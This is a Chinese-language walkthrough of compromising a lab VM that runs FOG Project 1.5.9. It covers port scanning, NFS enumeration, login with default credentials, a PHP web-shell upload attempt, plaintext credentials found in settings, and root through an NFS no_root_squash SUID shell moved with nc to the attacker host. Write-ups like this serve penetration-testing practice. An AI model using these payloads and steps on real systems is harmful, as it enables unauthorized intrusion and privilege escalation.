所渗透的靶机IP为192.168.56.121

端口扫描

sudo nmap --min-rate 10000 -p- 192.168.56.121      
[sudo] mikannse 的密码：
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-20 04:54 UTC
Nmap scan report for 192.168.56.121 (192.168.56.121)
Host is up (0.00010s latency).
Not shown: 65524 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
443/tcp   open  https
2049/tcp  open  nfs
3306/tcp  open  mysql
38977/tcp open  unknown
42677/tcp open  unknown
51475/tcp open  unknown
60049/tcp open  unknown
MAC Address: 08:00:27:22:E0:5D (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.35 seconds

sudo nmap -sT -sV -sC -O -p21,22,80,111,443,2049,3306,38977,42677,51475,60049 192.168.56.121
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-20 04:55 UTC
Nmap scan report for 192.168.56.121 (192.168.56.121)
Host is up (0.00037s latency).

PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      vsftpd 3.0.3
22/tcp    open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 ee:01:82:dc:7a:00:0e:0e:fc:d9:08:ca:d8:7e:e5:2e (RSA)
|   256 44:af:47:d8:9f:ea:ae:3e:9f:aa:ec:1d:fb:22:aa:0f (ECDSA)
|_  256 6a:fb:b4:13:64:df:6e:75:b2:b9:4e:f1:92:97:72:30 (ED25519)
80/tcp    open  http     Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      32792/udp   mountd
|   100005  1,2,3      37729/tcp6  mountd
|   100005  1,2,3      51475/tcp   mountd
|   100005  1,2,3      53279/udp6  mountd
|   100021  1,3,4      35971/udp   nlockmgr
|   100021  1,3,4      37273/tcp6  nlockmgr
|   100021  1,3,4      38977/tcp   nlockmgr
|   100021  1,3,4      60334/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
443/tcp   open  http     Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
2049/tcp  open  nfs      3-4 (RPC #100003)
3306/tcp  open  mysql    MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|   Thread ID: 89
|   Capabilities flags: 63486
|   Some Capabilities: SupportsLoadDataLocal, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, SupportsCompression, LongColumnFlag, InteractiveClient, ConnectWithDatabase, Support41Auth, ODBCClient, SupportsTransactions, IgnoreSigpipes, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, FoundRows, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: YTy&N5^X"=NP'nu&Wcm{
|_  Auth Plugin Name: mysql_native_password
38977/tcp open  nlockmgr 1-4 (RPC #100021)
42677/tcp open  mountd   1-3 (RPC #100005)
51475/tcp open  mountd   1-3 (RPC #100005)
60049/tcp open  mountd   1-3 (RPC #100005)
MAC Address: 08:00:27:22:E0:5D (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.5
Network Distance: 1 hop
Service Info: Host: 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.95 seconds

信息搜集

ftp没有匿名登录，看下NFS

showmount -e 192.168.56.121
Export list for 192.168.56.121:
/images/dev *
/images     *

sudo mkdir /tmp/kalinfs

sudo mount -t nfs 192.168.56.121:/images/dev /tmp/kalinfs

里面有两个fog文件?但是都没有接触过不太了解，先放一边吧

Getshell

访问80端口,根目录是一个apache的默认页面。扫描目录得到一个/fog，是一个fog project的登录界面，了解了一下，似乎是用于管理计算机的磁盘映像的，与NFS中的应该是一个东西。可以找到1.5.9的exp，但是需要拿到登录之后才能使用。

尝试fog的默认凭证fog:password发现可以登录，在设置界面可以找到版本就是1.5.9

尝试exp: /usr/share/exploitdb/exploits/php/webapps/49811.txt

dd if=/dev/zero of=myshell bs=10485760 count=1

echo '<?php $cmd=$_GET["cmd"]; system($cmd); ?>' >> myshell

echo "http://192.168.56.102/myshell" | base64
aHR0cDovLzE5Mi4xNjguNTYuMTAyL215c2hlbGwK

当执行后面install myshell.php时报错了:

Type: 1024, File: /var/www/html/fog/lib/fog/fogftp.class.php, Line: 219, Message: FTP connection failed, Host: 192.168.1.123, Username: fogproject

似乎一些设置被更改了

但是在storage的DefaultMember中能找到一个凭证

fogproject:84D1gia!8M9HSsR8gXau

尝试ssh登录，但是失败了，返回:

ssh fogproject@192.168.56.121 -t /bin/sh

用sh环境可以绕过

提权

没有别的用户了，想到之前的NFS，第一反应是经典的no_root_squash

cat /etc/exports

/images *(ro,sync,no_wdelay,no_subtree_check,insecure_locks,no_root_squash,insecure,fsid=0)
/images/dev *(rw,async,no_wdelay,no_subtree_check,no_root_squash,insecure,fsid=1)

的确是开启了的，并且images目录是只读的，但是/images/dev是可写的，所以前面挂载要挂/images/dev目录

kali/tmp目录中:

nc -lvnp 1234 >root_sh

在靶机上

cat  /bin/sh | nc 192.168.56.102 1234

kali中

sudo cp /tmp/root_sh /tmp/kalinfs

sudo chmod +xs /tmp/kalinfs/root_sh

靶机中

./root_sh -p

现在我们是root!

碎碎念

这里记录一下我在提权过程中碰到的几个坑

1: 一开始挂载了/images而不是/images/dev，导致没有可写的权限

2:kali中的/bin/sh和靶机中的不一样，会导致库的缺失

3:在靶机中不要直接以fogproject的身份将sh文件复制到挂载点，这样会导致最终无法将身份权限改成root。要在kali中以root身份创建sh文件